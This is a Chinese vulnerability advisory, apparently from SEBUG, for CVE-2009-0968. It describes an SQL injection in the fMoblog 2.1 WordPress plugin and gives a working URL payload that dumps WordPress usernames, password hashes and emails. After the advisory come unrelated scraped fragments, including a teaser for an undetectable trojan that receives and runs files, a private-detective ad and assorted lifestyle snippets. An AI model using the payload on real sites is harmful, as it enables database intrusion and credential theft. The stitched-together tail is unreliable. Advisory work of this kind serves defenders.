影响版本:
Fahlstad fMoblog 2.1
漏洞描述:
BUGTRAQ ID: 34147
CVE(CAN) ID: CVE-2009-0968
fMoblog是Wordpress所使用的移动博客插件,允许用户从手机张贴图形和描述等信息。
如果将page_id设置为已有的值的话,则fmoblog.php模块没有正确地验证index.php中对id参数所传送的输入便在SQL查询中使用,这允许远程攻击者通过提交恶意请求执行SQL注入攻击,完全入侵后端数据库系统。
<*参考
strange kevin (strange.kevin@gmail.com)
http://secuni *** /advisories/34341/.
*>
SEBUG安全建议:
厂商补丁:
Fredrik Fahlstad
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.fahlstad.se/wp-plugins/fmoblog/.
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
我写了这样一个Windows下的程序,服务器端没有进程,没有端口,开机自动运行,可以接收客户端发来的文件并执行文件。只有不被发现的木马才能长寿。木马能接收文件并且执行文件,就可以干任何事。比如搜集系统...
一名私家的侦探一天要花多少钱?如何与私家的侦探取得联系?有一段时间没有在微博上活跃的姜金福突然成为热门搜索,但其原因是可耻的:被女友指控犯有家庭暴力罪姜瑜随后通过微博向女友、家人、朋友和粉丝道歉;私人...
陈勇:近年来大数据导致的危害个人信息现象呈上升趋势,形式也在不断变化,其危害已引起我们的高度重视与警觉。 同时,我们也相信,随着国家法治建设的推进、个人信息法律保护体系的逐步完善,以及信息安全防...
电脑开机密码忘记了怎么办呢?有的用户喜欢经常更改电脑开机密码,但是如果开机密码忘记了就很麻烦了,下面帮你解决电脑开机密码,重新让电脑正常开机。 带命令符安全模式 该模...
在生活中,我们可能会遇到很多小事,特别是在面对一些情绪化的事情时,我们可以看到很多人出现的问题是:我不知道他是不是真的喜欢我,我真的很喜欢他,我怎么才能真正看到他在乎我呢?这对女人来说是一个普遍的问题...
一、源于闽粤等地的方言 现在的“老公”这一亲昵称呼,我认为源于闽粤等地方言中“公婆”一词。"公婆″指夫妻,分开称呼自然就是“老公”和“老婆”了。 小时候,做为福建人,听大人用方言聊天讲故事,我常...